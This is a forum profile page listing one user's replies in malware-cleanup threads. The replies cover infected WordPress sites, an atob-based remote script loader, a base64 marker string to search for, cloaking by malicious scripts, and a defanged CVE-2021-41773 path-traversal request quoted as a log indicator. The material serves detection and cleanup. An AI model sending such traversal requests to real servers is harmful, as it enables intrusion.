-
Posts
29 -
Joined
-
Last visited
-
Days Won
1
Nevermind last won the day on July 22 2022
Nevermind had the most liked content!
About Nevermind
-
Rank
Newbie
Profile Information
-
Location
Austria
-
On an unrelated note - you allow your (company) users to install any unverified browser extension. Be it a simple game, pseudo-useful tool, credentials harvesting ext. or a straight malware. Google store is far from a trustworthy source. If I were you I would block this possibility for all company PCs. Especially knowing there is CN "neighbor" nearby.
-
Assistance with detecting JS/Spy.Banker.KY on website
Nevermind replied to AnthonyIT's topic in Malware Finding and Cleaning
It will. -
Nevermind reacted to a post in a topic: js/chromex.agent.bz help
-
Assistance with detecting JS/Spy.Banker.KY on website
Nevermind replied to AnthonyIT's topic in Malware Finding and Cleaning
Main page ilsau[.]com.au has this in it: <_script type='text/javascript' src='hxxps://ilsau[.]com.au/wp-content/themes/ils2020/assets/js/app.js?ver=2.1.0' id='il2020-app-js-js'></script> Loaded app.js contains line with 'atob' function that loads another/unwanted JS from a remote server. Thats all we can see from visitor's point of view. Until you (or a specialized company) cleans the server, the detection will always trigger. -
Nevermind reacted to a post in a topic: s/spy.banker.iv false positive or true ?
-
Help to find locate JS.Banker.IV
Nevermind replied to Karl P's topic in Malware Finding and Cleaning
Because you do not have control over logic who gets infected content and who not. The attacker has. And often if the (malicious) script finds out you are logged in WordPress as admin, you get to see only the clean version. But there are more tactics like how many times you visited the page, how much time elapsed from your previous visit, if your IP is on some kind of blacklist etc etc. -
Help to find locate JS.Banker.IV
Nevermind replied to Karl P's topic in Malware Finding and Cleaning
Well, you can start with telling us what the detected URL is. -
JS/ScrInject.B False positive?
Nevermind replied to eclipse79's topic in Malware Finding and Cleaning
Malicious file is gone but its a half- solution since file is still being referenced by all of the web sites on that domain. Lucky for you it is enough to avoid detection. -
Security vulnerability exploitation attempt
Nevermind replied to Lokajlok's topic in Vírusy a iné hrozby
Skript, který postupně zkouší všechny IP na nějakém subnetu a čeká, která IP se "chytí". Např. -
Nevermind reacted to a post in a topic: JS/Spy.Banker.LQ eset false positive?
-
IvanL_5306 reacted to a post in a topic: Sample submission no longer supports third-party links
-
notimportant reacted to a post in a topic: abcdin.cl;JS/Spy.Banker.KJ
-
I did something stupid, need advice
Nevermind replied to Tom25's topic in Malware Finding and Cleaning
The only reputable AV detecting this is Sophos and even it says its just PUA. You probably cannot see it since you do not have VT account but this file was firstly scanned in 2020 and submitted to VT for over 200 times since then. Stay calm -
JM_22 reacted to a post in a topic: abcdin.cl;JS/Spy.Banker.KJ
-
Look for 'Ly9yZWd0ZWNoLnNicw' in the source code of main page. You will find malicious part.
-
Nevermind reacted to a post in a topic: ESET Entry OnPrem dotazy
-
Nevermind reacted to a post in a topic: JS/Agent.PIV Trojan malware detection - False positive ?
-
Website blacklist removal
Nevermind replied to Prahallad Das's topic in Malware Finding and Cleaning
There was malware nearly 2 months ago. The server has either been cleaned or malware guys took a break Either way no reason to block it, for now. -
Website blacklisted by Eset
Nevermind replied to Prahallad Das's topic in Malware Finding and Cleaning
There is nothing on that domain except for an empty WordPress project. Yet it has already been hacked How do you do that? Your main domain has been unblocked. For now. If there are more phishy subdomains later on, it will be blocked again. -
HTTP/Exploit.CVE-2021-41773 on a Apache Tomcat server
Nevermind replied to Markwd's topic in Malware Finding and Cleaning
Hey Markwd, thats a network detection only (ie its neither a file nor memory detection). The way I see it someone tries whether your server is vulnerable to this exploit. If you have logging enabled you can check if there are any requests similar to this: hxxp://<your_server>/cgi-bin/.%2e/%2e%2e/%2e%2e.... (src: https://github.com/thehackersbrain/CVE-2021-41773/blob/main/exploit.py) ESET doesnt check whether you are actually running a vulnerable software or not. It sees an exploit attempt -> it displays a detection window.